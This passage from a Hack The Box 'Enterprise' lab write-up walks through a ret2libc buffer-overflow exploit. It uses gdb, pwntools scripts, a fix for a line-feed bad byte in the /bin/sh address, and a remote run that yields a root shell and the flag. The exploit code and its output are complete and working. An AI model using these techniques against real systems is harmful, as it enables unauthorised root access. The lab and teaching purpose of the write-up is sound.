*** stack smashing detected ***: <unknown> terminated
[*] Got EOF while reading in interactive
$
[*] Process './lcarsprg' stopped with exit code -6 (SIGABRT) (pid 8733)
[*] Got EOF while sending in interactive
But it doesn't work.
gdb-peda$ br main
Breakpoint 1 at 0x56555ca0
gdb-peda$ r
Starting program: /opt/HTB/Machines/Enterprise/lcarsprg
[----------------------------------registers-----------------------------------]
EAX: 0xf7fa1808 --> 0xffffd61c --> 0xffffd76a ("SHELL=/bin/bash")
EBX: 0x0
ECX: 0xffffd580 --> 0x1
EDX: 0xffffd5a4 --> 0x0
ESI: 0xf7f9f000 --> 0x1dfd6c
EDI: 0xf7f9f000 --> 0x1dfd6c
EBP: 0xffffd568 --> 0x0
ESP: 0xffffd560 --> 0xffffd580 --> 0x1
EIP: 0x56555ca0 (<main+15>:	sub    esp,0x10)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555c9c <main+11>:	mov    ebp,esp
   0x56555c9e <main+13>:	push   ebx
   0x56555c9f <main+14>:	push   ecx
=> 0x56555ca0 <main+15>:	sub    esp,0x10
   0x56555ca3 <main+18>:	call   0x56555620 <__x86.get_pc_thunk.bx>
   0x56555ca8 <main+23>:	add    ebx,0x2358
   0x56555cae <main+29>:	sub    esp,0x4
   0x56555cb1 <main+32>:	push   0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd560 --> 0xffffd580 --> 0x1
0004| 0xffffd564 --> 0x0
0008| 0xffffd568 --> 0x0
0012| 0xffffd56c --> 0xf7dddef1 (<__libc_start_main+241>:	add    esp,0x10)
0016| 0xffffd570 --> 0xf7f9f000 --> 0x1dfd6c
0020| 0xffffd574 --> 0xf7f9f000 --> 0x1dfd6c
0024| 0xffffd578 --> 0x0
0028| 0xffffd57c --> 0xf7dddef1 (<__libc_start_main+241>:	add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x56555ca0 in main ()
gdb-peda$ print &system
$1 = (<text variable, no debug info> *) 0xf7e03630 <system>
gdb-peda$ print &exit
$2 = (<text variable, no debug info> *) 0xf7df63a0 <exit>
gdb-peda$ find /bin/sh
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xf7f47406 ("/bin/sh")
gdb-peda$ distance 0xf7dff630 0xf7e03630
From 0xf7dff630 to 0xf7e03630: 16384 bytes, 4096 dwords
The values are different: as the distance command shows, the addresses seen in gdb are 16384 bytes (4096 dwords) above the ones computed from the ldd base. We rewrite our exploit with the gdb values.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_local.py
#!/usr/bin/python
from pwn import *

junk = 'D'*212

process = process('./lcarsprg')

#glibcbase=0xf7dbb000
#systemoffs=0x00044630
#exitoff=0x000373a0
#binshoff=0x188406

#systemaddr=glibcbase+systemoffs
#exitaddr=glibcbase+exitoff
#binshaddr=glibcbase+binshoff

systemaddr=0xf7e03630
exitaddr=0xf7df63a0
binshaddr=0xf7f47406

log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)
payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)

process.recvuntil('Enter Bridge Access Code:')
process.send('picarda1\n')
process.recvuntil('Waiting for input:')
process.send('4\n')
process.recvuntil('Enter Security Override:')
process.send(payload)
process.send('\n')
process.interactive()

#print payload
file = open("payload","w")
file.write(payload)
file.close()
We test it.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_local.py
[+] Starting local process './lcarsprg': pid 8781
[*] systemaddr 0xf7e03630
[*] exitaddr 0xf7df63a0
[*] binshaddr 0xf7f47406
[*] Switching to interactive mode
$ $ id
uid=0(root) gid=1000(u505) groups=1000(u505),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),120(scanner)
$ exit
Rerouting Tertiary EPS Junctions: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD06▒▒c▒▒\x0[*] Process './lcarsprg' stopped with exit code 0 (pid 8781)
[*] Got EOF while reading in interactive
$
[*] Got EOF while sending in interactive
Remote exploit
(gdb) br main
Breakpoint 1 at 0x56555ca0
(gdb) r
Starting program: /bin/lcars
(gdb) print &system
$1 = (<text variable, no debug info> *) 0xf7e4c060 <system>
(gdb) print &exit
$2 = (<text variable, no debug info> *) 0xf7e3faf0 <exit>
(gdb) find &system,+9999999,"/bin/sh"
0xf7f70a0f
warning: Unable to access 16000 bytes of target memory at 0xf7fca797, halting search.
1 pattern found.
We create our exploit.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_target.py
#!/usr/bin/python
from pwn import *

# padding up to the saved return address
junk = 'D'*212

conn = remote('10.10.10.61',32812)

# absolute addresses read from gdb on the target
systemaddr=0xf7e4c060
exitaddr=0xf7e3faf0
binshaddr=0xf7f70a0f

log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)

# ret2libc chain: return into system(), then exit(), with "/bin/sh" as argument
payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)

conn.recvuntil('Enter Bridge Access Code:')
conn.send('picarda1\n')
conn.recvuntil('Waiting for input:')
conn.send('4\n')
conn.recvuntil('Enter Security Override:')
conn.send(payload)
conn.interactive()

# keep a copy of the payload on disk for inspection
#print payload
file = open("payload","w")
file.write(payload)
file.close()
Run of the exploit.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_target.py
[+] Opening connection to 10.10.10.61 on port 32812: Done
[*] systemaddr 0xf7e4c060
[*] exitaddr 0xf7e3faf0
[*] binshaddr 0xf7f70a0f
[*] Switching to interactive mode
Rerouting Tertiary EPS Junctions: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD`▒▒▒[*] Got EOF while reading in interactive
$ id
$
[*] Closed connection to 10.10.10.61 port 32812
[*] Got EOF while sending in interactive
It doesn't work.
u505@kali:~/HTB/Machines/Enterprise$ xxd payload
00000000: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000010: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000020: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000030: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000040: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000050: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000060: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000070: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000080: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000090: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000a0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000b0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000c0: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
000000d0: 4444 4444 60c0 e4f7 f0fa e3f7 0f0a f7f7 DDDD`...........
There is a line feed (0x0a) in the address of the /bin/sh string (0xf7f70a0f). The input is cut at that byte, so the rest of the address is never transmitted. Instead of looking for /bin/sh we search for sh only.
(gdb) find &system,+999999999999999,"sh"
0xf7f6ddd5
0xf7f6e7e1
0xf7f70a14
0xf7f72582
warning: Unable to access 16000 bytes of target memory at 0xf7fc8485, halting search.
4 patterns found.
We find 4 candidates. The third one corresponds to our previous address plus 5 bytes (the "sh" inside "/bin/sh") and still contains 0x0a; the other 3 are usable.
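To make the truncation concrete, here is an added example (not part of the writeup) that packs the three addresses the way the script does, checks each candidate for a 0x0a byte, and models a reader that stops at the first line feed, showing why the /bin/sh address is lost while the sh address survives. The addresses are the ones found above; the reader model is an assumption, not the binary's actual input routine.

```python
import struct

# Sample values taken from the gdb output above (constructed test data)
SYSTEM_ADDR = 0xf7e4c060
EXIT_ADDR = 0xf7e3faf0
BINSH_ADDR = 0xf7f70a0f   # "/bin/sh": packed form carries a 0x0a byte
SH_ADDR = 0xf7f6ddd5      # "sh": no 0x0a byte
# The four "sh" hits gdb reported
CANDIDATES = [0xf7f6ddd5, 0xf7f6e7e1, 0xf7f70a14, 0xf7f72582]


def p32(value):
    """Pack a 32-bit address little-endian, as pwntools p32() does."""
    return struct.pack("<I", value)


def bad_bytes_in(addr, bad=(0x0a,)):
    """List the forbidden bytes an address would contain once packed."""
    return [b for b in p32(addr) if b in bad]


def usable_candidates(addrs, bad=(0x0a,)):
    """Keep only the addresses that contain none of the forbidden bytes."""
    return [a for a in addrs if not bad_bytes_in(a, bad)]


def build_payload(system_addr, exit_addr, arg_addr, junk_len=212):
    """Same layout as the script: padding, system, exit, argument pointer."""
    return b"D" * junk_len + p32(system_addr) + p32(exit_addr) + p32(arg_addr)


def line_oriented_read(data):
    """Assumed model of the target's reader: everything after the first 0x0a is dropped."""
    nl = data.find(b"\n")
    return data if nl < 0 else data[:nl]


def delivered_length(payload):
    """How many bytes of the payload the modelled reader actually keeps."""
    return len(line_oriented_read(payload))


if __name__ == "__main__":
    for name, addr in (("/bin/sh", BINSH_ADDR), ("sh", SH_ADDR)):
        kept = delivered_length(build_payload(SYSTEM_ADDR, EXIT_ADDR, addr))
        print("%-8s bad bytes %-6s kept %d of 224" % (name, bad_bytes_in(addr), kept))
    print("usable:", [hex(a) for a in usable_candidates(CANDIDATES)])
```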
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_target.py
#!/usr/bin/python
from pwn import *

# padding up to the saved return address
junk = 'D'*212

conn = remote('10.10.10.61',32812)

# absolute addresses read from gdb on the target
systemaddr=0xf7e4c060
exitaddr=0xf7e3faf0
# "/bin/sh" address contains 0x0a and gets truncated; use an "sh" string instead
#binshaddr=0xf7f70a0f
binshaddr=0xf7f6ddd5

log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)

# ret2libc chain: return into system(), then exit(), with "sh" as argument
payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)

conn.recvuntil('Enter Bridge Access Code:')
conn.send('picarda1\n')
conn.recvuntil('Waiting for input:')
conn.send('4\n')
conn.recvuntil('Enter Security Override:')
conn.send(payload)
conn.interactive()

# keep a copy of the payload on disk for inspection
#print payload
file = open("payload","w")
file.write(payload)
file.close()
Run the exploit.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_target.py
[+] Opening connection to 10.10.10.61 on port 32812: Done
[*] systemaddr 0xf7e4c060
[*] exitaddr 0xf7e3faf0
[*] binshaddr 0xf7f6ddd5
[*] Switching to interactive mode
$ $ id
uid=0(root) gid=0(root) groups=0(root)
$ cat /root/root.txt
<ROOT_FLAG>
$ exit
Rerouting Tertiary EPS Junctions: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD`▒▒▒▒[*] Got EOF while reading in interactive
$ $
[*] Closed connection to 10.10.10.61 port 32812
[*] Got EOF while sending in interactive
Daniel Simao 10:34, 25 May 2020 (EDT)